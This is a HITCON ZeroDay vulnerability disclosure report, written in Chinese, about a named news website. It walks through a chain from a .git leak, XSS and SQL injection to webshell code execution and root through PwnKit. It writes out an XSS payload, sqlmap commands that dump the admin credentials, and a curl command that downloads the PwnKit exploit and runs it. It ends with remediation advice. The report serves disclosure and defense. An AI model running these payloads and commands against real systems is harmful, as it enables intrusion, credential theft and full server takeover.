Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2023-00068
- 發信 Vendor: MOT TIMES 明日誌
- Title: MOT TIMES 明日誌 網站存在 git leak 與 XSS 與 SQL injection to RCE to Pwnkit 提權
- Introduction: 網站存在 git leak 與 XSS 與 SQL injection to RCE 與 Pwnkit 提權
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2023/02/17 15:38:08 : 新提交 (由 BTtea 更新此狀態)
- 2023/02/17 15:46:50 : 新提交 (由 BTtea 更新此狀態)
- 2023/02/19 18:52:37 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/03/01 17:30:38 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/03/01 17:31:35 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2023/04/19 03:00:08 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2023-00068
- 通報者:blacktea_player (BTtea)
- 風險:嚴重
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
使用工具 SQLmap 輔助測試 (以下若使用SQLmap工具進行注入時有中斷問題,請去除 --batch 參數後進行注入,遇到詢問連線異常是否繼續測試的訊息請選擇預設默認選項,通常是 y )
-
git leak
利用 web path scan 工具掃瞄,可以發現後台管理系統還有 git 洩漏,可透過 git hacker 等工具進行還原。
後臺管理系統http://www.mottimes.com/admin/home.phpgit leak
http://www.mottimes.com/.git/config http://www.mottimes.com/.git/COMMIT_EDITMSG http://www.mottimes.com/.git/description http://www.mottimes.com/.git/HEAD http://www.mottimes.com/.git/info/refs http://www.mottimes.com/.git/info/exclude http://www.mottimes.com/.git/logs/HEAD http://www.mottimes.com/.git/logs/refs/heads/master http://www.mottimes.com/.git/refs/heads/master http://www.mottimes.com/.git/packed-refs http://www.mottimes.com/.git/objects/info/packs http://www.mottimes.com/.gitignore http://www.mottimes.com/.git/index -
XSS
http://www.mottimes.com/cht/search.php?q=
GET 參數 q 存在 XSS
XSS payload'><script>alert(document.cookie)</script>運行結果
-
SQL injection
http://www.mottimes.com/cht/search.php?q=
GET 參數 q 存在 SQL injection
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "http://www.mottimes.com/cht/search.php?q=123" --prefix "' " --suffix " and '123" --dbs -v 3 --batch運行結果
-
SQL injection to RCE
首先由上方以掃出的後台,透過 SQLmap 找到登入帳密。
SQLmap 工具測試參數 ( 加上 -v 3 顯示更詳細的執行過程,加上 --flush-session 清除復現過程記錄 )python3 sqlmap.py --random-agent -u "http://www.mottimes.com/cht/search.php?q=123" -v 3 --prefix "' " --suffix " and '123" --dbs -D 指定帳密所在的資料庫 -T 指定帳密所在的資料表 -C id,pws --dump --batch從右側選單 > MOTTIMES圖片 > 列表 > 新增 > 上傳檔案 (webshell)。
然後來到「MOTTIMES圖片」可以看到 webshell 的位址,連過去後即可 RCE。
運行結果 -
Pwnkit
利用 webshell 查看系統核心版本發現過舊,參考 https://github.com/ly4k/PwnKit
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit賦予執行權限後拿到 root
chmod +x ./PwnKit ./PwnKit 'id' -
無意義但不應該被存取的站點目錄可能導致資訊洩漏或其他危害
http://www.mottimes.com/info.php (phpinfo,後端技術詳細資訊)
http://www.mottimes.com/js/swfupload/swfupload.swf
已將所有上傳後門與提權腳本盡數刪除
修補建議
建議可以使用 htmlspecialchars 函式來預防 XSS
htmlspecialchars用法:
https://www.w3schools.com/php/func_string_htmlspecialchars.asp
XSS攻擊防禦原理解說:(wiki):
https://zh.wikipedia.org/zh-tw/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC
建議可以使用 PDO 框架或者 mysqli_real_escape_string 函式,或者改寫成參數化查詢來預防 SQL injection。
PDO用法:
https://blog.tarswork.com/article/quick-start-operation-mysql-using-php-pdo/
mysqli_real_escape_string用法:
https://www.runoob.com/php/func-mysqli-real-escape-string.html
參數化查詢原理解說(wiki):
https://zh.wikipedia.org/zh-tw/%E5%8F%83%E6%95%B8%E5%8C%96%E6%9F%A5%E8%A9%A2
SQL injection 攻擊成因解說(wiki):
https://zh.wikipedia.org/zh-tw/SQL%E6%B3%A8%E5%85%A5